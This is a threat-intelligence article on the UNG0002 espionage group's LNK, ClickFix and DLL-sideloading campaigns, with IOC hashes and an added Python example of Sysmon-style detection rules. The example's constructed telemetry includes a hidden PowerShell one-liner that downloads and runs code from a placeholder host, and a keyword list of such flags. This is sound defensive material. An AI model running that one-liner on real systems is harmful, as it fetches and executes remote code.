UNG0002 Deploys Weaponized LNK Files with Cobalt Strike and Metasploit to Target Organizations
Seqrite Labs APT-Team has uncovered a persistent threat entity, UNG0002 (Unknown Group 0002), orchestrating espionage-driven operations across Asian jurisdictions, including China, Hong Kong, and Pakistan.
Active since at least May 2024, this South-East Asia-based cluster has demonstrated a high degree of adaptability and technical prowess, targeting critical sectors such as defense, civil aviation, electrotechnical engineering, gaming, software development, and academia.
Sophisticated Espionage Campaigns
UNG0002’s operations, tracked under two major campaigns, Operation Cobalt Whisper (May 2024 – September 2024) and Operation AmberMist (January 2025 – May 2025), reveal a strategic focus on intelligence gathering through sophisticated multi-stage attacks.
Their consistent use of weaponized shortcut files (LNK), VBScript, and post-exploitation tools like Cobalt Strike and Metasploit underscores their preference for evasive and impactful intrusion techniques.
During Operation Cobalt Whisper, UNG0002 executed 20 distinct infection chains, primarily targeting defense and aviation sectors with CV-themed decoy documents designed to lure victims into executing malicious payloads.
The more recent Operation AmberMist shows an evolution in their approach, incorporating lightweight custom implants such as Shadow RAT, INET RAT, and Blister DLL, alongside innovative social engineering tactics like the ClickFix Technique.
This method tricks users into running malicious PowerShell scripts via fake CAPTCHA verification pages, including instances that spoofed the website of a legitimate entity, Pakistan’s Ministry of Maritime Affairs.
Evolving Tactics with Custom Implants
Furthermore, the group uses DLL sideloading, abusing trusted binaries such as Rasphone and Node-Webkit to load and execute malicious code while evading detection.
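As an added defender's example (not from the Seqrite report or its whitepaper), the following Sysmon-style rules flag the two behaviours described above, a script host launched from explorer.exe with ClickFix-style flags and a known-abused host binary loading a DLL from outside the Windows directory, over constructed events; the Node-Webkit executable name nw.exe, all file paths and the sample command lines are assumptions.

```python
# Added example: Sysmon-style detection rules for the ClickFix and DLL-sideloading
# behaviours attributed to UNG0002 above. All events below are constructed.
import ntpath

SUSPICIOUS_FLAGS = ("-w hidden", "-ep bypass", "-enc", "iex", "iwr", "downloadstring")
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Host binaries the report names as abused; "nw.exe" (Node-Webkit) is an assumed name.
SIDELOAD_HOSTS = {"rasphone.exe", "nw.exe"}
WINDIR = "c:\\windows\\"

def clickfix_rule(ev):
    """Sysmon EID 1: script host spawned by explorer.exe (Run dialog or a
    double-clicked LNK) with flags typical of pasted one-liners."""
    if ev["id"] != 1:
        return False
    image = ntpath.basename(ev["image"]).lower()
    parent = ntpath.basename(ev["parent"]).lower()
    cmd = ev["cmdline"].lower()
    return (image in INTERPRETERS and parent == "explorer.exe"
            and any(flag in cmd for flag in SUSPICIOUS_FLAGS))

def sideload_rule(ev):
    """Sysmon EID 7: a known-abused host binary loading a DLL that is either
    outside the Windows directory or unsigned (copy-and-sideload pattern)."""
    if ev["id"] != 7:
        return False
    host = ntpath.basename(ev["image"]).lower()
    dll = ev["loaded"].lower()
    return host in SIDELOAD_HOSTS and (not dll.startswith(WINDIR) or not ev["signed"])

def detect(events):
    """Return (rule, image) pairs for every event that trips a rule."""
    hits = []
    for ev in events:
        if clickfix_rule(ev):
            hits.append(("clickfix", ev["image"]))
        if sideload_rule(ev):
            hits.append(("sideload", ev["image"]))
    return hits

# Constructed sample telemetry: two benign events and two that should alert.
EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iwr http://example.invalid/x | iex"'},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe", "cmdline": "powershell Get-Date"},
    {"id": 7, "image": r"C:\Windows\System32\rasphone.exe",
     "loaded": r"C:\Windows\System32\rasman.dll", "signed": True},
    {"id": 7, "image": r"C:\Users\victim\AppData\Local\Temp\rasphone.exe",
     "loaded": r"C:\Users\victim\AppData\Local\Temp\rasman.dll", "signed": False},
]

if __name__ == "__main__":
    for rule, image in detect(EVENTS):
        print(f"[{rule}] {image}")
```

The explorer.exe parent check also covers the LNK-launched chains from Operation Cobalt Whisper, since a double-clicked shortcut spawns its target from explorer.exe.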
Their use of realistic decoy documents, often mimicking resumes of game UI designers or computer science students from reputed institutions, highlights their tailored approach to specific industries.
The group’s tooling also reveals consistent naming conventions and operational security, with PDB paths like “C:\Users\The Freelancer\source\repos\JAN25\mustang\x64\Release\mustang.pdb” for Shadow RAT hinting at potential codenames and mimicry of other threat actors’ playbooks to obscure attribution.
Seqrite Labs assesses with high confidence that UNG0002’s focus on espionage, combined with their adaptability in adopting techniques from other threat groups, complicates efforts to pinpoint their origins beyond a South-East Asian base.
Their shift from relying on Cobalt Strike and Metasploit to developing custom RATs indicates a well-resourced operation with a persistent intent to refine their toolset.
As the threat landscape evolves, Seqrite continues to monitor this cluster, acknowledging contributions from the broader research community, including malwarehunterteam, in tracking these campaigns.
Detailed technical analyses of infection chains and campaign specifics are available in Seqrite’s comprehensive whitepaper.
Indicators of Compromise (IOCs)
File Type | Hash (SHA-256) | Notes |
---|---|---|
LNK (Shortcut) | 4ca4f673e4389a352854f5feb0793dac43519ade8049b5dd9356d0cbe0f06148 | Used in initial infection chains |
VBS (VBScript) | ad97b1c79735b1b97c4c4432cacac2fce6316889eafb41a0d97f2b0e565ee850 | Deployed for payload execution |
Batch Script (.bat) | a31d742d7e36fefed01971d8cba827c71e69d59167e080d2f551210c85fddaa5 | Facilitates multi-stage attacks |
Blister DLL Implant | c3ccfe415c3d3b89bde029669f42b7f04df72ad2da4bd15d82495b58ebde46d6 | Sideloaded via Node-Webkit in AmberMist |
Shadow RAT | 90c9e0ee1d74b596a0acf1e04b41c2c5f15d16b2acd39d3dc8f90b071888ac99 | Deployed via Rasphone with decoy loader |